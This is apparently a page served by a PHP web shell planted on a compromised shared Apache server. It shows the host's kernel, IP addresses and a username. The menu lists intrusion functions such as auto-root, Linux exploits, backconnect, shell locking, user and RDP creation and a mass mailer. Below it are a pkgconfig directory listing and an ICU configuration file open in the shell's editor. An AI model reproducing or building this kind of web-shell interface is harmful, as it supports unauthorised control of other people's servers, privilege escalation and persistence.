Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
pkgconfig /
[ HOME SHELL ]
Name
Size
Permission
Action
mit-krb5
[ DIR ]
drwxr-xr-x
com_err.pc
279
B
-rw-r--r--
expat.pc
246
B
-rw-r--r--
fcgi++.pc
207
B
-rw-r--r--
fcgi.pc
201
B
-rw-r--r--
form.pc
454
B
-rw-r--r--
formw.pc
457
B
-rw-r--r--
freetype2.pc
341
B
-rw-r--r--
gmp.pc
252
B
-rw-r--r--
gmpxx.pc
287
B
-rw-r--r--
gssrpc.pc
291
B
-rw-r--r--
icu-i18n.pc
1.23
KB
-rw-r--r--
icu-io.pc
1.22
KB
-rw-r--r--
icu-uc.pc
1.26
KB
-rw-r--r--
kadm-client.pc
312
B
-rw-r--r--
kadm-server.pc
308
B
-rw-r--r--
kdb.pc
343
B
-rw-r--r--
krb5-gssapi.pc
224
B
-rw-r--r--
krb5.pc
345
B
-rw-r--r--
libbrotlicommon.pc
275
B
-rw-r--r--
libbrotlidec.pc
302
B
-rw-r--r--
libbrotlienc.pc
302
B
-rw-r--r--
libcgroup.pc
222
B
-rw-r--r--
libcrypt.pc
389
B
-rw-r--r--
libcrypto.pc
299
B
-rw-r--r--
libcurl.pc
1.84
KB
-rw-r--r--
libexslt.pc
311
B
-rw-r--r--
libffi.pc
214
B
-rw-r--r--
libjpeg.pc
238
B
-rw-r--r--
liblzma.pc
407
B
-rw-r--r--
libmagic.pc
235
B
-rw-r--r--
libmpeg2.pc
246
B
-rw-r--r--
libmpeg2convert.pc
263
B
-rw-r--r--
libnsl.pc
306
B
-rw-r--r--
libpng.pc
271
B
-rw-r--r--
libpng16.pc
271
B
-rw-r--r--
libsass.pc
268
B
-rw-r--r--
libssl.pc
280
B
-rw-r--r--
libtirpc.pc
269
B
-rw-r--r--
libxcrypt.pc
389
B
-rw-r--r--
libxml-2.0.pc
308
B
-rw-r--r--
libxslt.pc
266
B
-rw-r--r--
libzstd.pc
420
B
-rw-r--r--
menu.pc
454
B
-rw-r--r--
menuw.pc
457
B
-rw-r--r--
mit-krb5-gssapi.pc
299
B
-rw-r--r--
mit-krb5.pc
442
B
-rw-r--r--
mysqlclient.pc
1.42
KB
-rw-r--r--
ncurses++.pc
483
B
-rw-r--r--
ncurses++w.pc
489
B
-rw-r--r--
ncurses.pc
459
B
-rw-r--r--
ncursesw.pc
461
B
-rw-r--r--
oniguruma.pc
259
B
-rw-r--r--
openssl.pc
234
B
-rw-r--r--
panel.pc
456
B
-rw-r--r--
panelw.pc
459
B
-rw-r--r--
python-3.10-embed.pc
300
B
-rw-r--r--
python-3.10.pc
284
B
-rw-r--r--
python3-embed.pc
300
B
-rw-r--r--
python3.pc
284
B
-rw-r--r--
readline.pc
318
B
-rw-r--r--
ruby-3.0.pc
1.93
KB
-rw-r--r--
ruby.pc
1.93
KB
-rw-r--r--
sqlite3.pc
277
B
-rw-r--r--
tic.pc
452
B
-rw-r--r--
tinfo.pc
461
B
-rw-r--r--
yaml-0.1.pc
224
B
-rw-r--r--
zlib.pc
265
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : icu-uc.pc
# Copyright (C) 2016 and later: Unicode, Inc. and others. # License & terms of use: http://www.unicode.org/copyright.html # Copyright (C) 2010-2013, International Business Machines Corporation. All Rights Reserved. # CFLAGS contains only anything end users should set CFLAGS = # CXXFLAGS contains only anything end users should set CXXFLAGS = -std=c++11 # DEFS only contains those UCONFIG_CPPFLAGS which are not auto-set by platform.h DEFS = prefix = /usr exec_prefix = ${prefix} #bindir = ${exec_prefix}/bin libdir = ${prefix}/lib/x86_64-linux-gnu includedir = ${prefix}/include baselibs = -lpthread -lm #datarootdir = ${prefix}/share #datadir = ${datarootdir} #sbindir = ${exec_prefix}/sbin #mandir = ${prefix}/share/man #sysconfdir = /etc UNICODE_VERSION=14.0 ICUPREFIX=icu ICULIBSUFFIX= LIBICU=lib${ICUPREFIX} #SHAREDLIBCFLAGS=-fPIC pkglibdir=${libdir}/icu${ICULIBSUFFIX}/70.1 #pkgdatadir=${datadir}/icu${ICULIBSUFFIX}/70.1 ICUDATA_NAME = icudt70l #ICUPKGDATA_DIR=${prefix}/lib/x86_64-linux-gnu #ICUDATA_DIR=${pkgdatadir} ICUDESC=International Components for Unicode Version: 70.1 Cflags: -I${includedir} # end of icu.pc.in Description: International Components for Unicode: Common and Data libraries Name: icu-uc Libs: -L${libdir} -licuuc -licudata Libs.private: ${baselibs}
Close